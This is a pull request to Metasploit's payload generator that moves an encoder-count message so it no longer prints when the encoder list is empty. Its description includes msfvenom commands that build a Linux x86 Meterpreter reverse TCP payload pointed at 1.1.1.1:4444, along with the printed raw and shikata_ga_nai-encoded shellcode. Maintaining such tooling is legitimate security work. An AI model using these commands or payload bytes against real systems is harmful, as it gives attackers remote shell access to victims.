### PR TITLE
Move "found" message to a saner location

### DIFF
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -176,10 +176,10 @@ module Msf
     def encode_payload(shellcode)
       shellcode = shellcode.dup
       encoder_list = get_encoders
-      cli_print "Found #{encoder_list.count} compatible encoders"
       if encoder_list.empty?
         shellcode
       else
+        cli_print "Found #{encoder_list.count} compatible encoders"
         encoder_list.each do |encoder_mod|
           cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}"
           begin


### PR DESCRIPTION
**Problem description:**

> < Peleus> So... msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f elf (Failed - 0 compatible encoders) but msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -e x86/shikata_ga_nai -f elf works?

This fix avoids the potentially misleading "Found 0 compatible encoders" message (usually due to no encoder or badchars being specified).

**Verification steps:**
- [x] `./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f c`
- [x] See that the "found 0" message is gone
- [x] `./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -e x86/shikata_ga_nai -f c`
- [x] `rspec spec/lib/msf/core/payload_generator_spec.rb`
- [x] See that the spec passes
- [x] Ship it

**Sample run:**

```
wvu@kharak:~/metasploit-framework:feature/encoder$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68\x01\x01\x01\x01\x68\x02\x00\x11\x5c\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1";
wvu@kharak:~/metasploit-framework:feature/encoder$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -e x86/shikata_ga_nai -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 98 (iteration=0)
unsigned char buf[] = 
"\xba\xd9\x85\x93\xac\xda\xdb\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x12\x31\x50\x15\x03\x50\x15\x83\xe8\xfc\xe2\x2c\xb4\x48\x5b"
"\x2d\xe4\x2d\xf7\xdb\x09\x02\x91\x92\xef\xaf\xde\x33\xb4\x47"
"\xde\x3a\x4a\x99\x88\x3e\x4c\x88\x14\xb7\xad\xc0\xc2\x9f\x7d"
"\x44\x5c\x96\x9f\x25\xaf\x28\xed\xad\x96\x28\x02\xb2\xe8\xa1"
"\xc1\x73\x03\xbd\xc4\x97\xd8\x0d\xbb\x9a\x61\x36\xcd\xc4\xfb"
"\x7e\xc1\xb6\xff\xb3\x5a\x49\x1e";
wvu@kharak:~/metasploit-framework:feature/encoder$ 
```
